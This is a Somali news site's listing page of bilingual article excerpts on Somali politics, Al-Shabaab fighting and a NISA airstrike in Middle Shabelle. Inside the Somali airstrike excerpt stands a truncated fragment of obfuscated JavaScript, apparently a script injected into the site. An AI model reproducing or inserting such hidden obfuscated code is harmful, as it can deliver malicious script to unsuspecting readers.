Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Soomaaliya Oo Taageero U Muujisay South Sudan xili ay ka jirto Xiisad Siyaasadeed 

MUQDISHO – Madaxweynayaasha Soomaaliya, Xasan Sheekh Maxamuud, ayaa Axaddii shalay u muujiyay “iskaashi buuxa" iyo taageero dowladda South Sudan, iyada oo xiisadda siyaasadeed ee dalkaas ay sii xoogeysaneyso kadib xiritaanka hogaamiyaasha mucaaradka. Xasan Sheekh ayaa wadahadal khad Taleefonka kula hadlay Madaxweyne Salva Kiir iyo Ku-xigeenka Madaxweynaha Riek Machar, wuxuuna u sheegay in Soomaaliya ay “si qoto dheer uga welwelsan tahay” xaalada...

Somalia Voices Support for South Sudan Amid Rising Political Tensions

MOGADISHU - Somali President Hassan Sheikh Mohamud expressed Somalia’s “full solidarity” with the people of South Sudan on Sunday, as political tensions escalated in the neighboring country following the arrest of opposition leaders earlier this month.   In a press release detailing a phone call with South Sudanese President Salva Kiir and Vice President Riek Machar, Mohamud said Somalia was “deeply...

Cabsi weerarada Al-Shabaab oo ka jirta qeybo kamid ah Gobolka Sh/Dhexe

WARSHEEKH - Wararka laga helayo gobolka Shabelada dhexe ayaa sheegaya in dagaalka dowladda iyo Al-Shabaab uu galo wajiyo cusub islamarkaana ay furmaan aagag dagaal oo cusub.   Wararka ayaa tilmaamay in Al-Shabaab ay yimaadeen meel kamid ah gobolka si ay u sii wadaan dagaalka ay kula jiraan dowladda. Maalmihii lasoo dhaafay dagaalo xoog leh ayaa gobolka waxa ay ku dhex marayeen...

Madaxweynaha oo kulan afur ah la qaatay culimada Soomaaliyeed

MUQDISHO, Soomaaliya - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa Madaxtooyada Qaranka kulan afur ah kula qaatay culimada Soomaaliyeed, isaga oo la wadaagay muhiimadda isku xirnaanta culimada, shacabka iyo dowladda oo laf-dhabar u ah qarannimada Soomaaliya.   Madaxweynaha ayaa culimada ku bogaadiyey kaalintooda muhiimka ah ee ay ku leeyihiin wacyigelinta bulshada, dib-u-heshiisiinta iyo xasilinta dalka, isaga oo si...

Somali Army’s Infantry Commander Inspects Frontline Troops in Middle Shabelle

MOGADISHU, Somalia – The commander of the Somali National Army’s Ground Forces, Major General Sahal Abdullahi Omar, conducted an inspection of frontline defense positions in the Middle Shabelle region on Sunday, as part of efforts to intensify operations against the Al-Shabaab militant group.   The visit comes amid a sustained military campaign to dislodge the Al-Qaeda-linked insurgents, who have waged a...

Taliyaha Ciidanka Dhulka oo Kormeeray Furimaha hore ee dagaalka Shabeellaha Dhexe

JOWHAR - Taliyaha Ciidanka Dhulka ee Xoogga Dalka Soomaaliyeed, Sarreeye Guuto Sahal Cabdullaahi Cumar, ayaa maanta kormeer ku tagay difaacyada ciidamada Xoogga Dalka iyo kuwa deegaanka ee ku sugan Gobolka Shabeellada Dhexe.   Kormeerkan ayaa ahaa mid lagu dardar-gelinayo hawlgalada lagu cirib tirayo Al-Shabaab, taas oo ah koox argagixiso ah oo ka dagaallanta gudaha Soomaaliya. Sarreeye Guuto Sahal Cabdullaahi Cumar ayaa...

Somalia: NISA Strikes Al-Shabaab in Al-Ba’ad, Kills Commander

MOGADISHU, Somalia  — The National Intelligence and Security Agency (NISA), working alongside international partners, carried out a targeted airstrike in the El-Ba'ad area of the Middle Shabelle region, killing several Al-Shabaab militants, including a key commander, Yusuf Dheg-naas, authorities said Saturday.   NISA confirmed the strike resulted in the death of Dheg-naas, who was responsible for overseeing Al-Shabaab’s operations in the...

NISA oo duqeyn cirka ah ku dishay xubin sare oo katirsan Al-Shabaab

MUQDISHO, Soomaaliya - Hay'adda NISA, ayaa soo saartay qoraal ay ku shaacisay in iyadoo kaashanaysay saaxiibada caalamka ay duqayn cirka ah ka fulisey deegaanka Ceel-bacad ee gobolka Shabeellaha Dhexe. Sida ku xusan war-saxaafadeedka NISA, duqeynta waxaa lagu dilay Yuusuf Dheg-naas, kaasoo Al-Shabaab u qaabilsanaa degaanka Ceel-Bacad, iyadoo xubno la socday ay ku dhinteen duqeynta.   function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function...

Somali President Honors Women Leaders for Role in Al-Shabaab Fight, Democracy

MOGADISHU – Somali President Hassan Sheikh Mohamud hosted an iftar event on Saturday to honor Somali women leaders on International Women's Day, praising their vital role in the fight against Al-Shabaab and the nation's democratic progress.   Speaking at the event in the state house, Mohamud highlighted the central role of women in Somali society, noting their contributions to liberating the...

Xasan Sheekh oo ka hadlay geeddi-socodka dimuqraadiyadda iyo xoreynta dalka

MUQDISHO - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa kulan afur ah ku maamuusay haldoorka haweenka Soomaaliyeed, munaasabad 8-da Maarso oo ah Maalinta Haweenka Adduunka awgeed.   Madaxweyne Xasan Sheekh Maxamuud ayaa si qoto dheer u sharaxay kaalinta muhiimka ah ee haweenka Soomaaliyeed ay ka qaadanayaan dagaalka lagula jiro Al-Shabaab, kaas oo haweenku ay yihiin udub-dhexaadka bulshada, islamarkaana...

WARAR KALE

Talks to Free Egyptian Sailors Held by Somali Pirates Collapse Over Ransom Dispute

MOGADISHU — Negotiations aimed at securing the release of eight Egyptian sailors held hostage by Somali pirates have collapsed after the kidnappers withdrew from...

Aadan Madoobe oo Ku Guuleystay Doorashada Madaxtinimada Koonfur Galbeed

BAYDHABO – Guddoomiyaha Golaha Shacabka Soomaaliya, Aadan Maxamed Nuur (Aadan Madoobe), ayaa ku guuleystay doorashada madaxtinimada Dowlad Goboleedka Koonfur Galbeed, kadib codbixin ay sameeyeen...

Somalia’s Parliament Speaker Wins South West State Presidential Election

BAIDOA, Somalia — Somalia's House of the People Speaker, Aden Mohamed Nur Madobe, was elected president of South West State on Wednesday in a...